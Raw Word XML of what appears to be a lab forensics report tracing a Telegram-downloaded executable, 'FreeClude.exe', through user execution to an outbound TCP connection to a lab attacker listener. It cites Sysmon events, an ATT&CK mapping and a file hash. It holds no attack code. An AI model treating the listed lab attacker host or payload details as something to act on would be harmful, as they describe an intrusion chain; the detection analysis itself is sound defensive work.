                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Suggested evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F448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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6604FE92">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31C252D7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Telegram Web file download followed by user execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EEC737F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B958780">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D561C06">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B6E0633">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D3845DB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A file downloaded through Telegram Web was subsequently executed from the user's Downloads directory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13EBD747">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="389F249D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="266DC57E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event 15 (Zone.Identifier) + Sysmon Event 1 (Process Creation) + SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FAB02FE">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C84A8AC">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="334155"/>
        </w:rPr>
        <w:t>Key supplied Sysmon evidence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="23C6B01B">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5935DA3A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File stream created (Event 15)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C09D13">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:09:57.557</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="177DB2BD">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="67E8F9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TargetFilename: C:\Users\saada\Downloads\Unconfirmed 635978.crdownload:Zone.Identifier</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F64614F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="67E8F9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ZoneId=3  HostUrl=https://web.telegram.org/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4698E3F4">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="006D2511">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Process Create (Event 1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2239495A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:10:36.376</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F1F463">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="67E8F9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C95CE7A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="67E8F9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParentImage: C:\Windows\explorer.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="445AC7CF">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="67E8F9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: SH-WIN10\saad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2888A1">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IntegrityLevel: High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A59B443">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SHA256: 7673C78000C1DF5FDD6C863C494F2D00FC961C947F2B8ABD0E7BCC212765EBF1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BCFDDA1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DEEA8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>06 / EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10E78D">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2 — Payload Exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; </w:t>
      </w:r>
      <w:r>
        <w:t>Initial Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB6A50">
      <w:pPr>
        <w:pStyle w:val="36"/>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second phase begins when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FreeClude.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed on the Windows 10 endpoint. Sysmon Event 1 records the executable running from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:\Users\saada\Downloads\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:\Windows\explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as its parent process, under the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SH-WIN10\saad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user with High integrity. The same process then initiates a TCP connection from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192.168.110.156</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192.168.110.141:33398</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, matching the lab's attacker-side host and listener configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A1298">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The execution is mapped to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T1204.002 — User Execution: Malicious File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the downloaded executable was launched from the user's Downloads directory. The network event provides additional evidence of the payload's immediate outbound communication. The supplied Event 7 should be treated as supporting evidence that the executable loaded itself; it does not, by itself, prove DLL side-loading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="39"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="998" w:tblpY="5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8460"/>
      </w:tblGrid>
      <w:tr w14:paraId="6205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4ACCD9A9">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="none"/>
                <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17A5EC76">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="203F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7EA5AD88">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t>Scenario variant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23A02328">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Downloaded payload executed on Windows 10 followed by outbound TCP communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1119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40C016F3">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t>ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A195C9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T1204.002 — User Execution: Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F4A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547AFC7D">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t>What to prove</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C1A0F58">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FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> was executed from the user's Downloads directory and subsequently established a TCP connection to the lab attacker host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4BF18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43BFC6CE">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t>Suggested evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BA2FFF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Sysmon Event 1 (Process Creation) + Sysmon Event 3 (Network Connection) + Sysmon Event 7 (Image Loaded) + SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D64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1FCF73B3">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t>Payload execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F4E164D">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FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> launched from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>C:\Users\saada\Downloads\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>C:\Windows\explorer.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> as the parent process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="62F0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3BA7674C">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t>Execution evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8460" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F1CA3F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Sysmon Event 1 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>ParentImage: C:\Windows\explorer.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
